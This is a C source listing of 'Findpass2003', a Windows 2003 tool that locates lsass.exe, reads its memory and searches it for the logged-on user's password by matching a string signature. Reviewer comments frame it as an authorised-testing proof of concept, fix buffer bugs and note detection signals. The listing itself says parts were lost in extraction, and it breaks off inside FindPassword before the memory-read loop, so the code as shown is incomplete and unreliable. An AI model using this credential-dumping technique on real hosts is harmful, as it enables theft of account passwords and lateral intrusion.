Findpass2003 Source


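/* *****************************************************************************
 * Version      : v1.0
 * Coder        : WinEggDrop
 * Date Release : 12/15/2004
 * Purpose      : Demonstrate searching for the logon user's password in memory
 *                on a Windows 2003 box.  The method is a heuristic signature
 *                scan of lsass.exe and is unreliable by design, but it may be
 *                the only way to recover the logon password on Windows 2003.
 * Test platform: Windows 2003
 * Compiled on  : VC 6.0
 *
 * Reviewer notes (security):
 *  - This is a credential-dumping proof of concept.  It opens lsass.exe with
 *    PROCESS_VM_READ, which needs administrative rights / SeDebugPrivilege and
 *    is a well-known detection signal (EDR / Sysmon process-access events on
 *    lsass).  Use only on systems you are authorised to test.
 *  - The recovered password lives in a writable global buffer; main() wipes
 *    it before exiting.
 *  - The listing on this page was extracted from HTML and lost every '<', '>'
 *    and '+' character.  The code below restores them; anything that could
 *    not be recovered from the visible text is marked NOTE(review).
 ***************************************************************************** */
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <tlhelp32.h>

/* Base memory address at which the search starts.  The password may sit
 * before this address or far beyond it, which is what makes the result
 * unreliable. */
#define BaseAddress 0x002b5000

char Password[MAX_PATH] = {0};   /* stores the found password (NUL-terminated) */

/* ---------------------------------------------------------------------------
 * function prototype declarations
 * ------------------------------------------------------------------------- */
BOOL  FindPassword(DWORD PID);
int   Search(char *Buffer, const UINT nSize);
DWORD GetLsassPID(void);
BOOL  Is2003(void);
/* end of function prototype declarations */

/*
 * Entry point.
 *  - refuses to run unless Is2003() reports a Windows 2003 box,
 *  - looks up the lsass.exe PID,
 *  - scans that process for the password,
 *  - wipes the global Password buffer before returning.
 * Returns 0 on a completed scan, -1 on a platform or PID-lookup failure.
 */
int main(void)
{
    DWORD PID = 0;

    printf("Windows 2003 Password Viewer v1.0 By WinEggDrop\n\n");

    if (!Is2003())     /* check that the box really is Windows 2003 */
    {
        printf("The Program Can Only Run On Windows 2003 Platform\n");
        return -1;
    }

    PID = GetLsassPID();   /* get the lsass.exe PID */
    if (PID == 0)          /* zero means the lookup failed */
    {
        return -1;
    }

    FindPassword(PID);     /* scan lsass.exe memory for the password */

    /* Do not leave the recovered credential lying around in process memory
     * after the tool has finished with it. */
    ZeroMemory(Password, sizeof(Password));
    return 0;
} /* end main() */

/* ---------------------------------------------------------------------------
 * Case-insensitive match of Word at Buffer[Pos] that refuses to read past
 * nSize.  The original compared with strnicmp() straight into the buffer,
 * which over-reads at the end of every chunk.
 * ------------------------------------------------------------------------- */
static BOOL MatchAt(const char *Buffer, UINT nSize, UINT Pos, const char *Word)
{
    size_t Len = strlen(Word);

    if (Pos >= nSize || Len > (size_t)(nSize - Pos))
    {
        return FALSE;
    }
    return strnicmp(&Buffer[Pos], Word, Len) == 0;
}

/* ---------------------------------------------------------------------------
 * Purpose    : Search the memory buffer and try to pick out the password.
 * Return type: int
 * Parameters : in : char *Buffer     -> the memory buffer to search
 *              in : const UINT nSize -> size of the buffer in bytes
 * Returns    : i + 7 (an index into Buffer, used by the caller only as a
 *              "found" flag) when the signature was located and Password[]
 *              was filled; -1 when Buffer is NULL or the signature is absent.
 * Note       : The routine looks for the magic sequence "LocalSystem",
 *              "Remote", "Procedure", "Call" (one byte between words),
 *              because the password is normally stored near it.  The
 *              signature is not always present and, even when it is, the
 *              password may live elsewhere -- this is luck, not parsing.
 *
 * Defects fixed against the listing:
 *  - every strnicmp() is now bounds-checked (MatchAt), so the scan cannot
 *    read past the end of the chunk;
 *  - the copy into Password[] is bounded.  The listing wrote
 *    Password[Count++] with no check against sizeof(Password), i.e. a run of
 *    positive bytes longer than MAX_PATH overflowed the global.
 * NOTE(review): the listing is garbled around the copy loop and shows no
 * terminator -- only the "> 0" filter and the unbounded write are visible.
 * The loop below therefore copies every positive byte from i + 7 to the end
 * of the chunk (or until Password is full); confirm against the original
 * source whether a terminator was intended.
 * ------------------------------------------------------------------------- */
int Search(char *Buffer, const UINT nSize)
{
    UINT Offset = 0;
    UINT i = 0;
    UINT j = 0;
    UINT Count = 0;
    BOOL Found = FALSE;

    if (Buffer == NULL)
    {
        return -1;
    }

    for (i = 0; i < nSize; i++)
    {
        if (!MatchAt(Buffer, nSize, i, "LocalSystem"))
        {
            continue;
        }
        Offset = (UINT)strlen("LocalSystem") + 1;
        if (!MatchAt(Buffer, nSize, i + Offset, "Remote"))
        {
            continue;
        }
        Offset += (UINT)strlen("Remote") + 1;
        if (!MatchAt(Buffer, nSize, i + Offset, "Procedure"))
        {
            continue;
        }
        Offset += (UINT)strlen("Procedure") + 1;
        if (MatchAt(Buffer, nSize, i + Offset, "Call"))
        {
            i += Offset;      /* i now indexes the "Call" word */
            Found = TRUE;
            break;
        }
    }

    if (!Found)
    {
        return -1;   /* well, we failed to find the password, and this always happens */
    }

    ZeroMemory(Password, sizeof(Password));
    for (j = i + 7; j < nSize; j++)
    {
        if (Buffer[j] > 0)   /* keep only positive bytes, as the listing does */
        {
            if (Count >= sizeof(Password) - 1)
            {
                break;       /* keep the NUL terminator; the listing overflowed here */
            }
            Password[Count++] = Buffer[j];
        }
    }
    return (int)(i + 7);     /* flag to indicate we found the password */
} /* end Search() */

/* ---------------------------------------------------------------------------
 * Purpose    : Get the lsass.exe PID via a Toolhelp32 process snapshot.
 * Return type: DWORD
 * Parameters : none
 * Returns    : the PID of the first process whose image name is lsass.exe
 *              (compared case-insensitively), or 0 when the snapshot cannot
 *              be created, cannot be walked, or no such process exists.
 * ------------------------------------------------------------------------- */
DWORD GetLsassPID(void)
{
    HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe32;
    DWORD PID = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("Fail To Create Snap Shot\n");
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);   /* Process32First requires dwSize */
    if (!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);          /* must clean up the snapshot object */
        return 0;
    }

    do
    {
        if (strcmpi(pe32.szExeFile, "lsass.exe") == 0)
        {
            PID = pe32.th32ProcessID;
            break;
        }
    } while (Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    return PID;
} /* end GetLsassPID() */

/* ---------------------------------------------------------------------------
 * Purpose    : Find the password by reading lsass.exe memory.
 * Return type: BOOL
 * Parameters : in : DWORD PID -> the lsass.exe PID
 * NOTE(review): the page's listing is truncated right after the OpenProcess
 * failure branch.  The read loop (presumably ReadProcessMemory from
 * BaseAddress into the 5 KB Buffer, handing each chunk to Search) and the
 * closing CloseHandle(hProcess) are not visible here, so only the visible
 * prefix is reproduced below.
 * ------------------------------------------------------------------------- */
BOOL FindPassword(DWORD PID)
{
    HANDLE hProcess = NULL;
    char Buffer[5 * 1024] = {0};
    DWORD ByteGet = 0;
    int Found = -1;

    /* Opening lsass with PROCESS_VM_READ is the classic credential-access
     * indicator; expect it to be logged or blocked on monitored hosts. */
    hProcess = OpenProcess(PROCESS_VM_READ, FALSE, PID);
    if (hProcess == NULL)
    {
        printf("Fail To Open Process\n");
        return FALSE;
    /* ... listing truncated here on the source page ... */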

